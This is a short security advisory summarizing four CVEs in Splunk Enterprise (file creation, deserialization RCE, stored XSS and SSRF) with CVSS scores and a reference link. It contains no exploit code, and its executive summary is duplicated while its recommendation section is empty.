EXECUTIVE SUMMARY:
Multiple security vulnerabilities have been identified in Splunk Enterprise (versions 9.3.x through 10.4.x). The flaws span several classes, including unauthenticated arbitrary file creation, remote code execution, stored cross‑site scripting, and server‑side request forgery. An attacker could manipulate database files, execute arbitrary code on the host, inject malicious scripts into dashboards, or force the system to contact internal services, potentially leading to data loss, service disruption, credential theft, and broader network compromise. The combined impact threatens the confidentiality, integrity, and availability of critical logging and analytics infrastructure relied upon by enterprises.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
Multiple security vulnerabilities have been identified in Splunk Enterprise (versions 9.3.x through 10.4.x). The flaws span several classes, including unauthenticated arbitrary file creation, remote code execution, stored cross‑site scripting, and server‑side request forgery. An attacker could manipulate database files, execute arbitrary code on the host, inject malicious scripts into dashboards, or force the system to contact internal services, potentially leading to data loss, service disruption, credential theft, and broader network compromise. The combined impact threatens the confidentiality, integrity, and availability of critical logging and analytics infrastructure relied upon by enterprises.[emaillocker id="1283"]
• CVE-2026-20253 with a CVSS score of 9.8 – An unauthenticated attacker can invoke a PostgreSQL sidecar endpoint to create or truncate arbitrary files, requiring only network access to the vulnerable service.
• CVE-2026-20251 with a CVSS score of 8.8 – A low‑privileged user can achieve remote code execution through unsafe deserialization of KV Store data in the Splunk Secure Gateway, exploiting the jsonpickle library without additional privileges.
• CVE-2026-20258 with a CVSS score of 7.1 – Stored XSS allows an attacker to embed malicious JavaScript in a classic dashboard HTML panel, which executes in the browsers of users viewing the dashboard.
• CVE-2026-20252 with a CVSS score of 7.6 – SSRF via the Dashboard Studio PDF export feature enables an attacker to force the server to issue requests to internal endpoints, potentially exposing sensitive services.
These vulnerabilities collectively present an immediate, high‑severity threat to any organization running vulnerable Splunk Enterprise instances. Exploitation could result in loss of logging data, unauthorized code execution, and exposure of internal network resources, undermining incident response and compliance efforts. Prompt action is essential to prevent attackers from leveraging these flaws to disrupt operations and compromise critical security monitoring capabilities.
RECOMMENDATION:
REFERENCES:
The following reports contain further technical details:
https://securityonline.info/splunk-enterprise-vulnerabilities-cvss-9-8/